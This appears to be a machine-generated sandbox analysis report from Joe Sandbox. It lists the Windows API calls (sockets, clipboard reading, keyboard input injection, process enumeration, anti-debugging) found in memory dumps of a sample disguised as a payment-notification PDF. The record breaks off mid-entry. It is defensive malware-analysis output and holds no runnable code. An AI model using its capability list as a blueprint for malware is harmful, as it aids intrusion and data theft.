                                                                                                                              • Opcode ID: e9394ad6baa6018d791cc9b50d18c0f9159fe7a3d059e449f3de26c7195e56f5
                                                                                                                              • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                              • Opcode Fuzzy Hash: e9394ad6baa6018d791cc9b50d18c0f9159fe7a3d059e449f3de26c7195e56f5
                                                                                                                              • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                                              APIs
                                                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                                              • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                                              • LockResource.KERNEL32(?), ref: 00433120
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Resource$FindLoadLock$Sizeof
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4215241788-0
                                                                                                                              • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                              • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                                              • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                              • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                                              APIs
                                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                              • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 540024437-0
                                                                                                                              • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                              • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                                              • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                              • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                                              APIs
                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                              • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                              • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Find$File$CloseFirstNextSleep
                                                                                                                              • String ID: *.*$\VH
                                                                                                                              • API String ID: 1749430636-2657498754
                                                                                                                              • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                              • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                              • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                              • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                              APIs
                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                              • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                              • String ID: pqI
                                                                                                                              • API String ID: 2579439406-2459173057
                                                                                                                              • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                              • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                                              • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                              • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00420494: SetFilePointer.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,0042D7C1,0042D7C1,?,0041B188,00000000,00000000,00000000,00000002,00000000,00000002), ref: 004204D6
                                                                                                                                • Part of subcall function 00420494: GetLastError.KERNEL32(?,0041B188,00000000,00000000,00000000,00000002,00000000,00000002,00000000,?,0041B847,00000000,?,0042D7C1,0048D260,00000010), ref: 004204E3
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8,00000109,00000000), ref: 00423943
                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8,00000109,00000000), ref: 0042394A
                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8), ref: 004239C6
                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8,00000109), ref: 004239CD
                                                                                                                              • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8), ref: 00423A28
                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8,00000109), ref: 00423A55
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1354853467-0
                                                                                                                              • Opcode ID: 75e0507c16032397253a36c483c650aa8ee90e2318997e4a1608cfc9692cb5c1
                                                                                                                              • Instruction ID: cd3137c8dbd02be27013a877d5fd1fddf93775f751d42d1efa9e46af4947de33
                                                                                                                              • Opcode Fuzzy Hash: 75e0507c16032397253a36c483c650aa8ee90e2318997e4a1608cfc9692cb5c1
                                                                                                                              • Instruction Fuzzy Hash: 7C414DB2A001256FCF102FB8DC05AAE7A71EB01325F54462BF930962E1D77D4EC18B58
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                              • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                              • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: KeyboardMessagePostState$InputSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3031425849-0
                                                                                                                              • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                              • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                                              • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                              • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastinet_addrsocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4170576061-0
                                                                                                                              • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                              • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                              • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                              • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                              • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                              • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                              • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                                                                                              • IsIconic.USER32 ref: 0047A393
                                                                                                                              • IsZoomed.USER32 ref: 0047A3A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 292994002-0
                                                                                                                              • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                              • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                                                                                              • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                                                                                              • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00478442
                                                                                                                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                                                                                              • CoUninitialize.OLE32 ref: 0047863C
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateInitializeInstanceUninitialize
                                                                                                                              • String ID: .lnk
                                                                                                                              • API String ID: 948891078-24824748
                                                                                                                              • Opcode ID: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                                              • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                                                                                              • Opcode Fuzzy Hash: 9da8986f0495ca00a6a2a6dbfcf51f3daa57ac4e6f9732571e53b5c4becaddd7
                                                                                                                              • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                              • API String ID: 0-2872873767
                                                                                                                              • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                              • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                              • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                              • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$CurrentTerminate
                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$T
                                                                                                                              • API String ID: 2429186680-740461495
                                                                                                                              • Opcode ID: b72cfe7de07cb9d0978f61b6edeb2304fb673773e5d036d49eb9d98452444512
                                                                                                                              • Instruction ID: 4e7ec58ed90b4ed80869aa83cdae9d8c721e1562ec3e7372f020a8cacf339105
                                                                                                                              • Opcode Fuzzy Hash: b72cfe7de07cb9d0978f61b6edeb2304fb673773e5d036d49eb9d98452444512
                                                                                                                              • Instruction Fuzzy Hash: DD528176E0026A8BDF14CFA8D4403EEB7B1FF94310F95816BD815AB381D7789946CB98
                                                                                                                              APIs
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 420147892-0
                                                                                                                              • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                              • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                              • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                              • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                              APIs
                                                                                                                              • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                              • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                              • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                              • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                              • String ID:
